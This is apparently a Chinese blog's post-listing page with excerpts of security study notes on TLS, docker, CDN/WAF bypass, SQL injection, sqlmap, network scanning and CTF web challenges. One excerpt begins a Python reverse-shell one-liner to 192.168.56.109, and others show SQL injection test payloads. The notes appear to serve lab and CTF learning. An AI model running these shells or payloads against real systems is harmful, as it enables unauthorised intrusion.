上一页 1 ··· 16 17 18 19 20
2021年1月14日
SSL/TLS
摘要: SSL/TLS TLS协议由TLS记录协议与TLS握手协议叠加而成。底层的TLS记录协议负责加密,上层的TLS握手协议负责加密以外的工作。 TLS记录协议 位于TLS握手协议的下层,负责使用对称密码对消息加密。使用了对称加密与消息认证码,但具体的算法与共享密钥是通过握手协议在服务器与客户端之间协商决 阅读全文
posted @ 2021-01-14 16:31 某某人8265 阅读(226) 评论(0) 推荐(0)
2020年12月30日
docker基础
摘要: docker 镜像管理 docker image pull alpin:latest docker image ls / docker images --filter xx=xx danging = true/false 返回(非)悬虚镜像 before 镜像名称或id since 镜像名称或id 阅读全文
posted @ 2020-12-30 08:44 某某人8265 阅读(72) 评论(0) 推荐(0)
2020年12月19日
CDN WAF 绕过
摘要: 查找二级域名 让服务器给用户发包(如 邮件) 再查看原文 找到ip 敏感文件泄露 查询历史解析ip https://www.ip138.com/ app抓包 修改hosts文件绕过 11种绕过CDN查找真实IP方法 https://www.cnblogs.com/qiudabai/p/9763739 阅读全文
posted @ 2020-12-19 23:08 某某人8265 阅读(110) 评论(0) 推荐(0)
工具收集
摘要: 本文记录kali不包含的工具 python -c 'import socket, subprocess, os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("192.168.56.109", 6666));os.d 阅读全文
posted @ 2020-12-19 20:56 某某人8265 阅读(99) 评论(0) 推荐(0)
2020年12月18日
SQL注入
摘要: SQLi 特殊字符: | | | | | | | | |0x3c62723e|换行符| | |0x7e|~ 在报错注入中防止截断| 五种检测方式 布尔型 and 1=1 -- 和 and 1=2 -- 时间型 错误型 输入一个 ‘ 造成错误,对盲注无效 联合型 基于union的联合查询,适用于后台通 阅读全文
posted @ 2020-12-18 22:08 某某人8265 阅读(215) 评论(0) 推荐(0)
2020年12月11日
pikachu平台
摘要: 暴力破解 通过js实现的前端验证码不妨碍爆破。 一般后端验证码的实现为:接受请求后生成字符与响应图片,将字符存入session一定时间内不过期。在提交数据时将提交的验证码数据与session内的检测。直接通过burp爆破,使用同一验证码且不再请求页面即可。 token无法防止爆破。因为token发送 阅读全文
posted @ 2020-12-11 20:31 某某人8265 阅读(258) 评论(0) 推荐(0)
sqlmap使用
摘要: 五种漏洞检测方式 基于布尔 and 1=1 -- 和 and 1=2 -- 基于时间 ' and (select * from (select(sleep(20)))a) # 测试20与0之间是否有较大的时间差 基于错误 一个 ' 造成语法错误,对盲注无效 基于 union 的联合查询,适用于通过 阅读全文
posted @ 2020-12-11 16:21 某某人8265 阅读(511) 评论(0) 推荐(0)
网络扫描知识
摘要: 网络扫描 二层arp 只能在同一局域网内扫描 arping 1.1.1.1 -c 次数 -d 设置指定mac nmap 192.168.0.1 -sn 同一网络里使用arp协议解析 netdiscover -i eth0 -r 192.168.1.0/24 主动扫描网段 netdiscover -p 阅读全文
posted @ 2020-12-11 14:33 某某人8265 阅读(498) 评论(0) 推荐(0)
mysql基础
摘要: MySql 操作数据库 SHOW VARIABLES LIKE 'datadir'; # 查看数据目录 show create table students \G # 查看sql语句 SHOW ENGINES; SHOW VARIABLES LIKE 'default_storage_engine% 阅读全文
posted @ 2020-12-11 13:01 某某人8265 阅读(139) 评论(0) 推荐(0)
xctf-web
摘要: ##view source Q:无法用鼠标右键查看原码,怎么办? A:浏览器地址栏在网址前输入 view-source: 即可查看源码 ##get post Q:用 get 提交 a=1,用 post 提交 b=2 A:url后加 ?a=1,用 hackbar 提交b=2 ##robots Q:ro 阅读全文
posted @ 2020-12-11 12:58 某某人8265 阅读(198) 评论(0) 推荐(0)
上一页 1 ··· 16 17 18 19 20